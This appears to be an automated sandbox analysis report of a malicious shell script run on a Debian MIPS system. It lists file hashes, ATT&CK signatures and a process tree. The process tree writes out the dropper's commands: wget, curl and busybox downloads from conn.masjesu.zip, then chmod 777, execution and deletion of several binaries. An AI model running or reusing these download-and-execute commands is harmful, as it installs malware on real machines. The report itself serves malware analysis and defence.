Analysis

  • max time kernel
    149s
  • max time network
    31s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    18/10/2024, 02:06

General

  • Target

    840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

  • Size

    10KB

  • MD5

    f6e271e4d94f1fe16e461104ef8f736a

  • SHA1

    dc7560e563611fd68f908f9baad26d7487947976

  • SHA256

    840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da

  • SHA512

    4435d20a9257c676d12aecdcca5eee355e04974d3429277c941b97658f8cefb32bc6b77fa47934d12ff9dc7d5457e3ab6a4ae80e4b7fa206d9ac58a61c02b084

  • SSDEEP

    192:so4QVCOCkSMFkqcTZx45O4QVCOoZx4MF1:sFkJFkqcTZx4RZx4MF1

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 11 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
    /tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
    1⤵
    PID:719
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:723
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      • System Network Configuration Discovery
      PID:725
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:742
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      • System Network Configuration Discovery
      PID:749
    • /bin/chmod
      chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      • File and Directory Permissions Modification
      PID:790
    • /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      ./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      • Executes dropped EXE
      PID:791
    • /bin/rm
      rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
      2⤵
      PID:795
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      • System Network Configuration Discovery
      PID:796
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:799
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      • System Network Configuration Discovery
      PID:801
    • /bin/chmod
      chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      • File and Directory Permissions Modification
      PID:832
    • /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      ./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      • Executes dropped EXE
      PID:833
    • /bin/rm
      rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
      2⤵
      PID:834
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      • System Network Configuration Discovery
      PID:835
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:836
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      • System Network Configuration Discovery
      PID:838
    • /bin/chmod
      chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      • File and Directory Permissions Modification
      PID:839
    • /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      ./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      • Executes dropped EXE
      PID:840
    • /bin/rm
      rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
      2⤵
      PID:841
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
      2⤵
      • System Network Configuration Discovery
      PID:842
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      PID:843

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

    Filesize

    153B

    MD5

    998368d7c95ea4293237f2320546e440

    SHA1

    30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

    SHA256

    533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

    SHA512

    648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97